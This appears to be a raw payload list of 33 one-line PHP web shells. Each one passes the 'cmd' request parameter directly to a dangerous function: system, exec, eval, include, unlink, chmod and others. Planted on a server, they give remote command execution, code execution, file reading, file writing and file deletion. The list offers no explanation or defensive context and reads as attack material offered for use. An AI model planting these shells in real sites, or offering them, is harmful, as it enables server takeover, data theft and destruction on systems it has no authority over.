<?php echo 'shell:'; system($_GET['cmd']); ?>
<?php echo 'shell:'; passthru($_GET['cmd']); ?>
<?php echo 'shell:'; exec($_GET['cmd']); ?>
<?php echo 'shell:'; shell_exec($_GET['cmd']); ?>
<?php echo 'shell:'; eval($_GET['cmd']); ?>
<?php echo 'shell:'; assert($_GET['cmd']); ?>
<?php echo 'shell:'; `$_GET['cmd']`; ?>
<?php echo 'shell:'; pclose(popen($_GET['cmd'], 'r')); ?>
<?php echo 'shell:'; proc_open($_GET['cmd'], $descriptorspec, $pipes); ?>
<?php echo 'shell:'; parse_ini_file($_GET['cmd']); ?>
<?php echo 'shell:'; include($_GET['cmd']); ?>
<?php echo 'shell:'; require($_GET['cmd']); ?>
<?php echo 'shell:'; file_get_contents($_GET['cmd']); ?>
<?php echo 'shell:'; readfile($_GET['cmd']); ?>
<?php echo 'shell:'; fopen($_GET['cmd'], 'r'); ?>
<?php echo 'shell:'; file($_GET['cmd']); ?>
<?php echo 'shell:'; unlink($_GET['cmd']); ?>
<?php echo 'shell:'; copy($_GET['cmd'], 'destination'); ?>
<?php echo 'shell:'; move_uploaded_file($_GET['cmd'], 'destination'); ?>
<?php echo 'shell:'; rename($_GET['cmd'], 'newname'); ?>
<?php echo 'shell:'; chmod($_GET['cmd'], 0777); ?>
<?php echo 'shell:'; chown($_GET['cmd'], 'user'); ?>
<?php echo 'shell:'; chgrp($_GET['cmd'], 'group'); ?>
<?php echo 'shell:'; mkdir($_GET['cmd']); ?>
<?php echo 'shell:'; rmdir($_GET['cmd']); ?>
<?php echo 'shell:'; symlink($_GET['cmd'], 'linkname'); ?>
<?php echo 'shell:'; link($_GET['cmd'], 'linkname'); ?>
<?php echo 'shell:'; touch($_GET['cmd']); ?>
<?php echo 'shell:'; file_put_contents($_GET['cmd'], 'data'); ?>
<?php echo 'shell:'; fwrite(fopen($_GET['cmd'], 'w'), 'data'); ?>
<?php echo 'shell:'; fputs(fopen($_GET['cmd'], 'w'), 'data'); ?>
<?php echo 'shell:'; fwrite(fopen($_GET['cmd'], 'a'), 'data'); ?>
<?php echo 'shell:'; fputs(fopen($_GET['cmd'], 'a'), 'data'); ?>
